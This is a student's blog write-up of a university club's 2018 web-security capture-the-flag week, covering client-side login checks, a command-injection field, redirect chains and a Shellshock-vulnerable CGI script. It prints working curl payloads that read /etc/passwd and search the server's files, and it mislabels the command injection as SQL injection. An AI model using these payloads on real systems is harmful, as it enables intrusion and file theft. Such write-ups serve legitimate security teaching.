Image for post
Image for post

RITSEC Fall 2018 CTF — Week 6

The sixth week of RITSEC’s Fall 2018 CTF has concluded. I post detailed write-ups here each week for the challenges I am able to solve. I do this because as a freshman, when I read the challenge write-ups they often went step-by-step but never elaborated on why a certain command was run or the strategy the user followed when solving the challenges. This is my effort to elaborate on the reasoning to the process. As always, let me know of any errors. RITSEC’s tech lead can also walk anyone through solving any of the expired flags if necessary.

Topic

This week is “Intro to Web”, which explores the developer console, input handling, web application vulnerabilities, and other topics. Points are earned by finding flags by finding a disguised object or element, or by exploiting a particular weakness in the way a challenge was created. All challenges are located on a subdomain of ritsec.club this week.

Easy 1 — Give me the answer!

The challenge submission form is (temporarily, until the website is fixed) a Google Form. The text field to input the flag for Easy 1 has response validation applied to it, meaning that the input must conform to a specified regular expression or a custom error message will be displayed. In this case, click the text field and enter any input.

Image for post
Image for post

As the data entered doesn’t conform to the requirements, the error message is shown. In this case, the flag was displayed because the input didn’t match the flag. The flag is RS{s3cr3t_an5w3r}.

Easy 2 — What’s the password?
Challenge link: web1.ritsec.club

Image for post
Image for post

The link presents the viewer with a login page for “a mini-ctf for you all to play”. Open the developer console in a web browser and view the source of the page.

Image for post
Image for post

There is nothing interesting about the HTML file in itself, but it does link to a JavaScript file web1.ritsec.club/js/login.js. Open the file by navigating to it or by opening it in the Sources tab of the developer console.

Image for post
Image for post

This file is very interesting, because it is following the very bad practice known as client-side authentication, which allows anyone viewing the web page to see the criteria necessary to login. In addition, the username and password fields are formatted as hexadecimal characters. This is reminiscent of a previous challenge. Stripping the \x from the username and password fields by using the find-replace feature of a text editor gives:

username: 61 64 6d 69 6e
password: 52 53 7b 63 6c 31 65 6e 74 5f 73 31 64 33 5f 61 75 74 68 7d

Converting these fields from hexadecimal to ASCII text gives:

username: admin
password: RS{cl1ent_s1d3_auth}

The flag is RS{cl1ent_s1d3_auth}. The username and password can now be used to login, if desired.

Image for post
Image for post

Medium 1 — It’s not always SQL you know!
Challenge link: web2.ritsec.club

Image for post
Image for post

Browsing to the link gives a page with a single text field. By inspecting the text field and button using the developer console, it can be seen that this field is sending a POST request to the server. Run the suggested ps command.

Image for post
Image for post

This returned the results of the ps command, but appended the flagsax to it before it was run, which means the command will display processes for all users and processes not running in a terminal. It also appended a grep command for the term that was entered. Next, try entering various escape characters to see if any undesired operation can be caused. This is an SQL injection, and is usually caused due to improper input handling, such as not restricting escape characters or another oversight that would let a user execute arbitrary code. Try using a command such as ps ; grep -r "RS{" to see if it returns the flag.

Nothing is returned. This may indicate that the semicolon(;) is being filtered on the server side. Try using a different escape character, like the pipe (|), instead of the semicolon in the same argument as above.

Image for post
Image for post

The flag is RS{S3mI_ColoN5_t0o_8ORin9}.

Medium 2 — What’s even happening?
Challenge link: web3.ritsec.club
Flag is not in “RS{}” format.

Open the provided link. The browser immediately starts redirecting in an infinite loop. Close the tab, open the developer console, and select the Network tab. Check “preserve log”, clear any content that may have already accumulated (Features vary by browser, so this process may be slightly different. For reference, I am using Chrome.), and browse to the link.

Image for post
Image for post

The redirects appear to start with web3.ritsec.club/M.html, so stop the page from loading as soon as that URL appears again. The list of redirects is collected. Inspect the names of the webpages. By discarding any anomalies such as animal names and the index, combining the names of the pages as a word gives M4nyR3d1rects2. The flag is RS{M4nyR3d1rects2}.

Hard — Find that flag! Good luck!
Challenge link: web4.ritsec.club

Navigate to the challenge link. An interesting page is presented.

Image for post
Image for post
Image for post
Image for post

The stats portion of the webpage seems similar to Medium 1. Open the developer console to look at the source.

Image for post
Image for post

This page has content loaded from the cgi-bin directory in the web server. This directory is part of the Common Gateway Interface, an antiquated interface most notable for allowing exploitation of the Shellshock vulnerability discovered in September 2014. Shellshock allows for arbitrary code execution when an attacker visits a website relying on CGI with a certain browser user-agent. User agents identify the browser to the website so the website can be formatted properly. This is typically used to adjust between desktop and mobile views, or to determine if the client is running an outdated browser that may not render the website properly.

Occasionally a server will receive a request that must be handled by running a different program on the machine, known as a handler. When the server uses CGI to pass a request from a browser to a handler program such as bash, it sends environment variables (variables that get or set settings in processes) to the program as well. This is how the results of the stats program are being displayed on the challenge website, and where the Shellshock vulnerability comes into play.

All Shellshock exploits begin with some variant of () { :; }; being placed in the browser’s user agent (either by modifying the user agent within the browser through the developer console or a third-party add-on), or by sending a user agent with a request through another application, such as curl, a tool for client-side URL transfers. Open a terminal and input the following command, which will use curl to exploit the Shellshock vulnerability in the challenge website.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \ 
http://web4.ritsec.club:80/cgi-bin/stats
Image for post
Image for post

The website is proven vulnerable to Shellshock! Being able to view the passwd file (and other files) on a publicly-facing web server is obviously a major security risk. A breakdown of the command that was run is as follows:

  • curl -h — Using curl, modify the header to include a specific message
  • user-agent: — Set the user agent
  • () { :; }; — An example string of text that can be used to trigger the Shellshock vulnerability. There are many variants of this.
  • echo; echo; /bin/bash -c — Run a command directly on the bash interpreter
  • cat /etc/passwd — The command to run
  • \
    http://web4.ritsec.club:80/cgi-bin/stats
    — The website to exploit

Now that shell access is obtained, search for anything that might be a flag.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / | grep 'flag''" \
http://web4.ritsec.club:80/cgi-bin/stats
Image for post
Image for post

This text file looks interesting. Open it.

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /opt/flag_boy.txt'" \                                                                                                                                                 http://web4.ritsec.club:80/cgi-bin/stats
Image for post
Image for post

The flag is RS{sh0cking1y_e4sy}.

In conclusion

If there are any errors, please let me know. I am still very new to web application vulnerabilities.

Building an application that could be potentially accessed by anyone on the internet has its challenges, with only a minority of potential problems represented in this week’s demo. The need for safer web development is strong enough that RIT offers a class dedicated to this area, Principles of Web Application Security, which is usually taken as a required class in a Computing Security student’s third year.

However, there are many excellent opportunities to learn how to exploit and secure websites without taking a class. There are vulnerability scanners for web applications (such as Nikto and Burp Suite) and web browsers (such as BeEF), pentesting tools such as Metasploit, and a whole list of other tools listed on OWASP’s website. These tools and then some come preinstalled on Kali Linux.

In addition, here are a few more articles discussing the Shellshock vulnerability and various exploitation techniques. Along with Heartbleed and CryptoLocker, the vulnerability was one of the most concerning of the year. Its use in this week’s challenges is a reminder that all vulnerabilities, even old ones, can still exist today and aren’t necessarily just historical context.

There will be 9 more weeks of challenges coming from RITSEC this semester! If you want to know more about RITSEC check out their website or attend a meeting if you’re on RIT’s campus — 12–4 PM in GOL-2410 for the CTF and presentations. Until next week!

Written by

DFIR, CTFs, disinformation, STEM education, and pretty much anything else that comes to mind. RIT Computing Security ’22. wyatttauber.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store